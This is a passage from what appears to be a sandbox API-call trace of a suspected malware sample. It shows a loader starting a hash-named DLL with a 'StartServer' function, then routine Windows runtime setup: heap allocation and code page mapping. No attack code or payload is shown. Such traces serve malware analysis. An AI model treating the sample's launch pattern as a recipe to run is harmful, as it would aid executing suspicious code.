¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0092.778] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0092.778] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0092.778] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0092.778] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0092.778] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x100) returned 0x4916b0 [0092.778] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x16a) returned 0x489a80 [0092.778] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0092.778] GetLastError () returned 0x0 [0092.778] SetLastError (dwErrCode=0x0) [0092.778] GetEnvironmentStringsW () returned 0x494660* [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x9cc) returned 0x495040 [0092.778] FreeEnvironmentStringsW (penv=0x494660) returned 1 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x118) returned 0x48a330 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3e) returned 0x4907f0 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x5c) returned 0x480780 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x484be0 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x78) returned 0x48c6d0 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x485a20 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x28) returned 0x48b660 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x48) returned 0x490160 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1a) returned 0x48b2a0 [0092.778] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3a) returned 0x490930 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x62) returned 0x4844f0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2a) returned 0x48c750 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2e) returned 0x484c50 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1c) returned 0x48b690 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xd2) returned 0x485cb0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x7c) returned 0x483fe0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3a) returned 0x48ffd0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x90) returned 0x483c10 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48b390 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x30) returned 0x484560 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x36) returned 0x485a90 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c) returned 0x490890 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x52) returned 0x489600 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c) returned 0x490020 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0xd6) returned 0x4855f0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2e) returned 0x4820c0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1e) returned 0x48b420 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2c) returned 0x482100 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x54) returned 0x489420 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x52) returned 0x489660 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48b3c0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x42) returned 0x490e80 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x2c) returned 0x482140 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x44) returned 0x4907a0 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x24) returned 0x48b9c0 [0092.779] HeapFree (in: hHeap=0x480000, dwFlags=0x0, lpMem=0x495040 | out: hHeap=0x480000) returned 1 [0092.779] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1000) returned 0x494660 [0092.780] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0092.780] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0092.780] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer" [0092.780] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x489750*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0092.781] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0092.784] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.784] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0092.784] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.784] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0092.784] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0092.785] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.785] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0092.786] GetProcessHeap () returned 0x480000 [0092.786] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.786] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0092.786] GetLastError () returned 0x0 [0092.786] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0092.786] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0092.786] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x3c8) returned 0x495af0 [0092.787] SetLastError (dwErrCode=0x0) [0092.787] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x8, Size=0x1200) returned 0x495ec0 [0092.789] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0092.789] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0092.789] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0092.789] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0092.789] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer" [0092.789] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=StartServer" [0092.789] GetACP () returned 0x4e4 [0092.789] RtlAllocateHeap (HeapHandle=0x480000, Flags=0x0, Size=0x228) returned 0x48ac80 [0092.789] IsValidCodePage (CodePage=0x4e4) returned 1 [0092.790] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0092.790] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0092.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0092.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0092.790] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0092.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0092.790] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0092.790] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0092.790] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0092.790] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0092.790] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0092.790] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0092.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0092.791] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0092.791] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0092.791] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, 